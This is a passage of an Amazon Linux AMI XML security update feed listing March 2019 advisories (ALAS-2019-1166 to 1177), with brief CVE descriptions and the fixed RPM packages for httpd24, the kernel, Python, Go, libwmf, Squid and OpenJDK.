release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.101" release="75.76.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.101-75.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1166</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1166: important priority package update for httpd24</title><issued date="2019-03-06 22:21:00" /><updated date="2019-03-25 23:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0190:
A bug exists in the way mod_ssl handled client renegotiations. A remote attacker could send a carefully crafted request that would cause mod_ssl to enter a loop, leading to a denial of service. This bug can only be triggered with Apache HTTP Server version 2.4.37 when using OpenSSL version 1.1.1 or later, due to an interaction between changes to the handling of renegotiation attempts.
1668488:
CVE-2019-0190 httpd: mod_ssl: infinite loop triggered by client-initiated renegotiation when using OpenSSL 1.1.1
CVE-2018-17199:
In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.
1668493:
CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time
CVE-2018-17189:
In Apache HTTP Server versions 2.4.37 and prior, by sending request bodies in a slowloris fashion to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections.
1668497:
CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17189" title="" id="CVE-2018-17189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17199" title="" id="CVE-2018-17199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0190" title="" id="CVE-2019-0190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.38" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.38-1.86.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.38" release="1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.38" release="1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.38" release="1.86.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mod24_ldap-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.38" release="1.86.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.38" release="1.86.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.38-1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1167</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2019-1167: important priority package update for kernel</title><issued date="2019-03-07 18:18:00" /><updated date="2019-03-25 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8912:
In the Linux kernel, af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free (UAF) in sockfs_setattr. A local attacker can use this flaw to escalate privileges and take control of the system.
1678685:
CVE-2019-8912 kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8912" title="" id="CVE-2019-8912" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.104" release="78.84.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.104-78.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2019-1169</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1169: medium priority package update for python27 python34 python35 python36</title><issued date="2019-03-21 19:25:00" /><updated date="2019-03-25 23:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5010:
A NULL pointer dereference vulnerability was found in the certificate parsing code in Python. This causes a denial of service to applications when parsing specially crafted certificates. This vulnerability is unlikely to be triggered if the application enables SSL/TLS certificate validation and accepts certificates only from trusted root certificate authorities.
1666519:
CVE-2019-5010 python: NULL pointer dereference using a specially crafted X509 certificate
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5010" title="" id="CVE-2019-5010" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.125.amzn1.i686.rpm</filename></package><package 
name="python27-debuginfo" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.41.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-test-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-devel" 
version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-tools-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1172</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1172: medium priority package update for golang</title><issued date="2019-03-07 16:17:00" /><updated date="2019-03-25 23:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-6486:
Go before 1.10.8 and 1.11.x before 1.11.5 mishandles P-521 and P-384 elliptic curves, which allows attackers to cause a denial of service (CPU consumption) or possibly conduct ECDH private key recovery attacks.
1668972:
CVE-2019-6486 golang: crypto/elliptic implementations of P-521 and P-384 elliptic curves allow for denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6486" title="" id="CVE-2019-6486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-src" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang" version="1.10.6" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.10.6-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.10.6-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.10.6" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.10.6-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.10.6-1.48.amzn1.i686.rpm</filename></package><package name="golang" version="1.10.6" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.10.6-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1174</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1174: low priority package update for 
libwmf</title><issued date="2019-03-21 18:35:00" /><updated date="2019-03-25 23:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-6978:
The GD Graphics Library (aka LibGD) 2.2.5 has a double free in the gdImage*Ptr() functions in gd_gif_out.c, gd_jpeg.c, and gd_wbmp.c. NOTE: PHP is unaffected.
1671390:
CVE-2019-6978 gd: double free in the gdImage*Ptr in gd_gif_out.c, gd_jpeg.c, and gd_wbmp.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6978" title="" id="CVE-2019-6978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwmf-lite" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-lite-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-devel-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf-lite" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-lite-0.2.8.4-41.13.amzn1.i686.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-devel-0.2.8.4-41.13.amzn1.i686.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-0.2.8.4-41.13.amzn1.i686.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1176</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1176: medium priority package update for squid</title><issued date="2019-03-18 17:59:00" /><updated date="2019-03-25 23:09:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19132:
A memory leak was discovered in the way Squid handles SNMP denied queries. A remote attacker may use this flaw to exhaust the resources on the server machine.
1645154:
CVE-2018-19132 squid: Memory leak in SNMP query rejection code
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19132" title="" id="CVE-2018-19132" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="12.38.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-12.38.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="12.38.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-12.38.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="12.38.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-12.38.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="12.38.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-12.38.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="12.38.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-12.38.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="12.38.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-12.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1177</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1177: medium priority package update for java-1.7.0-openjdk</title><issued date="2019-03-18 19:02:00" /><updated date="2019-03-25 23:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2422:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u201, 8u192 and 11.0.1; Java SE Embedded: 8u191. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1665945:
CVE-2019-2422 OpenJDK: memory disclosure in FileChannelImpl (Libraries, 8206290)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2422" title="" id="CVE-2019-2422" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-src" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.211-2.6.17.1.79.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.211" 